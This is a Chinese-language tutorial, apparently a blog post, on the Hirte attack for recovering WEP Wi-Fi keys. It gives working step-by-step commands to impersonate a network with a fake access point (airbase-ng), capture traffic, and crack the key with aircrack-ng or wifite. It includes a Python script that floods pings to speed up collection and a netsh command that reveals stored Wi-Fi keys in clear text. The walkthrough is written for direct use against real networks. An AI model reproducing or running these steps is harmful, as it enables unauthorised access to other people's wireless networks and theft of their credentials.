WEP-渗透WEP新思路–Hirte
1.Hirte介绍
Hirte是破解无线网络WEP Key的一种攻击类型
只要客户端设备(笔记本电脑,手机等)连接过的无线网络,那些WIFI即使是不在攻击者范围内也都能被破解,因为该wifi的WEP密钥和配置文件仍然存储在这些无线设备中。
netsh wlan show profile name="cisco-432F" key=clear
实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点。当客户端设备尝试自动连接到无线网络设时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流的数据包发出。
2.Hirte破解原理
1.安装一个假的WEP AP(wifi名,mac地址要相同)并等待客户端连接
2.客户端的连接等待自动分配IP地址
3.客户端发送一个ARP数据包
4.获得了ARP分组,并且将其转换成一个ARP请求为同一客户机
5.客户回复
6.收集这些数据包
7.破解WEP密钥
3.渗透姿势1
1.查看网卡信息
ip a
2.监听网卡
airmon-ng start wlan0
3.扫描附近的wifi
airodump-ng wlan0mon
4.配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK
airodump-ng wlan0mon --bssid D8:24:BD:79:18:0B --write HSEK
--bssid:AP的mac地址
--write:保存文件
命令执行后,会在当前目录下生成五个文件
5.开始伪造AP,用airbase-ng工具建立WEP接入点
airbase-ng -c 1 -a D8:24:BD:79:18:0B --essid "cisco-1809" -W 1 -N wlan0mon
-c:信道
-a:模拟AP的MAC地址
--essid:wifi的名称
-W:设置加密位
-N:使Hirte攻击模式
wlan0mon:是接口
6.只要有客户端一连上来,就会自动进行攻击
7.启动aircrack-ng从捕获的数据包:Hirte破解WEP密钥
aircrack-ng HSEK-01.cap
破解密码是有要求的,第一次ivs必须要大于5000,当小于这个数的话,就会提示
4.渗透姿势2
1.扫描并指定破解方式
wifite -wep -hirte
选择要破解的NUM
2.加速ivs收集
ping -t 192.168.1.1 //路由器的地址
3.开启攻击脚本加快ivs收集
python cmd.py
将下列代码保存为cmd.py 注意192.168.1.1这里填写你的路由器地址,我的是这个,你们的可能会有不同
import os
import threading
import time
class myThread (threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
cmd="ping /t 192.168.1.1"
os.system(cmd)
time.sleep(0.1)
threads=[]
for i in range(180):
thread1 = myThread()
thread1.start()
threads.append(thread1)
for item in threads:
item.join()
print ("退出主线程")
4.当ivs样本达到10000以后,成功获得密钥
1001
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
